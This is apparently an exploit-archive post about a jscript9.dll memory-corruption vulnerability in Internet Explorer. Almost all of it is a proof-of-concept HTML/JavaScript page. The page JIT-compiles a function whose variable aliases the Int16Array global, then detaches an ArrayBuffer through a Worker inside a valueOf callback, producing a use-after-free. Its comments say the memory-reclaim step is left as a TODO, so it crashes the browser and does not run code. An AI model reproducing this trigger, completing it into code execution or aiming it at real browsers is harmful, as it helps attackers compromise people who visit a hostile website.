
Internet Explorer jscript9.dll Memory Corruption

DarckSol

There is a vulnerability in jscript9 that could potentially be exploited to execute arbitrary code when viewing an attacker-controlled website in Internet Explorer. The vulnerability has been confirmed on Windows 10 64-bit with the latest security patches applied.

Код:
<!-- saved from url=(0014)about:internet -->
<script>

// Proof-of-concept trigger for the jscript9 memory-corruption bug described in
// the post. As written it only demonstrates the bug: the "reclaim freed memory"
// step in valueOf is an unfilled TODO, so the expected outcome is a crash of the
// renderer, not code execution. A companion 'worker.js' is required by the
// Worker constructor below and is not part of this listing.
// Style note: `worker` (in valueOf) and `vuln` (at the bottom) are assigned
// without a declaration and therefore become implicit globals.
alert('start');

// prepare objects
// NOTE(review): the buffer size (0x8c) and the Int32Array view are part of the
// trigger; the PoC appears to depend on these exact values — not confirmed here.
var buf = new ArrayBuffer(0x8c);
var arr = new Int32Array(buf);

var o = {};
// `o` is installed as the global `Int16Array` inside the generated function
// (see "Int16Array = o" below). Its valueOf is what runs when the JIT-compiled
// code coerces that object to a number.
o.valueOf = function() {

    alert('callback');

    // free: transfer `buf` to a worker (detaching it in this context) and
    // immediately terminate the worker.
    worker = new Worker('worker.js');
    worker.postMessage(buf, [buf]);
    worker.terminate();
    worker = null;

    // sleep: busy-wait for 200 ms (blocks the main thread; no setTimeout)
    var start = Date.now();
    while (Date.now() - start < 200) {}

    // TODO: reclaim freed memory
    // (left unimplemented in the PoC; without it the stale write only crashes)

    // Numeric result handed back to the coercion site in the generated function.
    return 0
};

// generate function from string in order to have a clean bytecode generator
// The body is kept as a string so that Function() compiles it separately from
// this script; the exact sequence and count of const/let declarations below is
// part of the trigger and should be treated as fixed.
var vulnstr =
"for (let i=0; i<1; i++) {\n" +
"    function opt(A, x, crash) {\n" +
"        'use strict';\n" +
"        const aagaaaaaaahabauaaaaa = x+1;\n" + //special variable name so that hash is equal to 0x109 (property ID of Int16Array)
"        const c02 = aagaaaaaaahabauaaaaa+1;\n" +
"        const c03 = c02+1;\n" +
"        const c04 = c03+1;\n" +
"        const c05 = c04+1;\n" +
"        let c06 = c05+1;\n" +  // this variable will alias with Int16Array
"        const c07 = c06+1;\n" +
"        const c08 = c07+1;\n" +
"        const c09 = c08+1;\n" +
"        const c10 = c09+1;\n" +
"        const c11 = c10+1;\n" +
"        const c12 = c11+1;\n" +
"        const c13 = c12+1;\n" +
"        const c14 = c13+1;\n" +
"        const c15 = c14+1;\n" +
"        const c16 = c15+1;\n" +
"        const c17 = c16+1;\n" +
"        const c18 = c17+1;\n" +
"        const c19 = c18+1;\n" +
"        const c20 = c19+1;\n" +
"        const c21 = c20+1;\n" +
"        const c22 = c21+1;\n" +
"        const c23 = c22+1;\n" +
"        const c24 = c23+1;\n" +
"        const c25 = c24+1;\n" +
"        const c26 = c25+1;\n" +
"        const c27 = c26+1;\n" +
"        const c28 = c27+1;\n" +
"        const c29 = c28+1;\n" +
"        const c30 = c29+1;\n" +
"        const c31 = c30+1;\n" +
"        const c32 = c31+1;\n" +
"        const c33 = c32+1;\n" +
"        const c34 = c33+1;\n" +
"        const c35 = c34+1;\n" +
"        const c36 = c35+1;\n" +
"        const c37 = c36+1;\n" +
"        const c38 = c37+1;\n" +
"        if(crash) {\n" +
"          c06 = c06 + 1;\n" + // we must change it here so that the value below is not known
"          Int16Array = o;\n" + // here we actually change the value (and type) of c06
"        }\n" +
"        A[0] = c06;\n" + // if crash==1, c06 is an object here, but JIT thinks it's an integer
"        eval(1);\n" +  // needed to trigger ByteCodeGenerator::EmitScopeObjectInit
"    }\n" +
"    for(var i=0; i<100000; i++) {\n" + // jit a function
"      opt(arr, 1, 0);\n" +
"    }\n" +
"    opt(arr, 1, 1);\n" +
"    alert('failed');\n" + // only reached if the crash did not occur
"}";


// Compile and run the generated source; `vuln` is an implicit global.
vuln = Function(vulnstr);
vuln();

</script>
 